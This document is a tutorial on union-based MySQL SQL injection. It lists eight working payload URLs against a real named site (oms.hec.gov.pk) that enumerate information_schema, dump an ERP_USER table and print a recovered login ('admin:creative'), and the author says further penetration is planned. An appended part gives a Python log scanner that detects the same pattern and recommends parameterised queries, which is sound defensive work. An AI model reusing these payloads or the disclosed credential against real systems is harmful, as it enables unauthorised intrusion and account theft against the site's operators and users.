1. Principle analysis

Let's look at the structure of information_schema, the system database that MySQL 5 added over earlier versions; it is used to store information about the database system.

mysql> use information_schema;
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema          |
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| KEY_COLUMN_USAGE                      |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

Here I pick out only the few tables that are useful in injection.

SCHEMATA ――> stores database names
  ――> key field: SCHEMA_NAME, the database name
TABLES ――> stores table names
  ――> key fields: TABLE_SCHEMA, the database the table belongs to; TABLE_NAME, the name of the table
COLUMNS ――> stores column names
  ――> key fields: TABLE_SCHEMA, the database the table belongs to; TABLE_NAME, the table the column belongs to; COLUMN_NAME, the column name

2. Injection process

1: http://oms.hec.gov.pk/?comp=newsletter_display.php&id=-19791009%20union%20all%20select%201,2,3,4,5,user(),7,8,9,10,11,12-- user
2: http://oms.hec.gov.pk/?comp=newsletter_display.php&id=-19791009%20union%20all%20select%201,2,3,4,5,version(),7,8,9,10,11,12-- version
3: http://oms.hec.gov.pk/?comp=newsletter_display.php&id=-19791009%20union%20all%20select%201,2,3,4,5,database(),7,8,9,10,11,12-- database
4: http://oms.hec.gov.pk/?comp=newsletter_display.php&id=-19791009%20union%20all%20select%201,2,3,4,5,table_name,7,8,9,10,11,12%20from%20information_schema.tables%20limit%201,1-- iterate through table names
5: http://oms.hec.gov.pk/?comp=newsletter_display.php&id=-19791009%20union%20all%20select%201,2,3,4,5,table_name,7,8,9,10,11,12%20from%20information_schema.tables%20limit%2034,1-- keep iterating
6: http://oms.hec.gov.pk/?comp=newsletter_display.php&id=-19791009%20union%20all%20select%201,2,3,4,5,column_name,7,8,9,10,11,12%20from%20information_schema.columns%20where%20table_name=char(69,82,80,95,85,83,69,82)%20limit%204,1/* column names of the table
7: http://oms.hec.gov.pk/?comp=newsletter_display.php&id=-19791009%20union%20all%20select%201,2,3,4,5,column_name,7,8,9,10,11,12%20from%20information_schema.columns%20where%20table_name=char(69,82,80,95,85,83,69,82)%20limit%205,1/* column names of the table
8: http://oms.hec.gov.pk/?comp=newsletter_display.php&id=-19791009%20union%20all%20select%201,2,3,4,5,concat(USER_NAME,0x3a,PASSWORD),7,8,9,10,11,12%20from%20HEC_OMS.ERP_USER%20limit%201,1/* step the offset up to get the passwords.

Here is one of them: admin:creative

At this point I got a lot of passwords, of different privilege levels. Due to IP restrictions, the penetration needs to be carried further.
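From the defender's side, the request pattern the post walks through (a negative id, union all select with a matching column count, row-by-row limit N,1 over information_schema, char()-encoded table names, and a trailing -- or /* comment) is easy to pick out of a web server access log. The script below is an added example and is not code from the post or its author; it runs over a few constructed log lines with placeholder IPs and host, decodes char(...) literals so an analyst can see which table name was being requested, and tags each suspicious request with the indicators it matched.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (placeholder IPs from the documentation
# ranges, no real host). Lines 2-4 copy the shape of the requests in the post;
# lines 1 and 5 are ordinary requests and must not raise an alert.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Sep/2024:17:35:01 +0800] "GET /?comp=newsletter_display.php&id=42 HTTP/1.1" 200 5120
203.0.113.5 - - [30/Sep/2024:17:35:02 +0800] "GET /?comp=newsletter_display.php&id=-19791009%20union%20all%20select%201,2,3,4,5,version(),7,8,9,10,11,12-- HTTP/1.1" 200 5210
203.0.113.5 - - [30/Sep/2024:17:35:03 +0800] "GET /?comp=newsletter_display.php&id=-19791009%20union%20all%20select%201,2,3,4,5,table_name,7,8,9,10,11,12%20from%20information_schema.tables%20limit%2034,1-- HTTP/1.1" 200 5215
203.0.113.5 - - [30/Sep/2024:17:35:04 +0800] "GET /?comp=newsletter_display.php&id=-19791009%20union%20all%20select%201,2,3,4,5,column_name,7,8,9,10,11,12%20from%20information_schema.columns%20where%20table_name=char(69,82,80,95,85,83,69,82)%20limit%204,1/* HTTP/1.1" 200 5218
198.51.100.7 - - [30/Sep/2024:17:36:10 +0800] "GET /?comp=newsletter_display.php&id=7 HTTP/1.1" 200 5100
"""

# Common-log-format line: ip ident user [timestamp] "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# MySQL char(n, n, ...) used to smuggle a string literal without quotes
CHAR_RE = re.compile(r'\bchar\s*\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)', re.IGNORECASE)

# Indicator label -> regex applied to each decoded query-string value
INDICATORS = [
    ("union-select", re.compile(r'\bunion\s+(?:all\s+)?select\b', re.I)),
    ("schema-enumeration", re.compile(r'\binformation_schema\.(?:schemata|tables|columns)\b', re.I)),
    ("char-encoded-literal", CHAR_RE),
    ("row-by-row-limit", re.compile(r'\blimit\s+\d+\s*,\s*1\b', re.I)),
    ("comment-truncation", re.compile(r'(?:--|/\*)\s*$')),
]


def decode_char_calls(sql):
    """Rewrite every char(n,n,...) call as the quoted string it builds,
    e.g. char(69,82,80,95,85,83,69,82) -> 'ERP_USER'."""
    def repl(match):
        codes = [int(c) for c in match.group(1).split(",")]
        return "'" + "".join(chr(c) for c in codes) + "'"
    return CHAR_RE.sub(repl, sql)


def analyse_target(target):
    """Return one finding per query parameter whose (percent-decoded) value
    matches at least one indicator. parse_qs does the percent-decoding."""
    parts = urlsplit(target)
    findings = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            hits = [label for label, rx in INDICATORS if rx.search(value)]
            if hits:
                findings.append({
                    "param": name,
                    "value": decode_char_calls(value),  # show the analyst the real table name
                    "indicators": hits,
                })
    return findings


def scan_log(text):
    """Parse each log line and collect alerts for requests that carry
    union-based injection indicators."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognisable access-log line
        findings = analyse_target(m.group("target"))
        if findings:
            alerts.append({"ip": m.group("ip"), "ts": m.group("ts"), "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        for f in alert["findings"]:
            print(alert["ip"], alert["ts"], f["param"], f["indicators"])
            print("   ", f["value"])
```

Running it reports three alerts, all from 203.0.113.5, and the fourth request's value is shown with the char() call already decoded to 'ERP_USER'. Rather than blocking on a single signature, the indicator list lets a rule fire on the combination (for example union-select plus schema-enumeration from one source within a minute), which is the row-by-row enumeration pattern the post relies on; the real fix on the application side remains parameterised queries so that id can never reach the SQL parser as text.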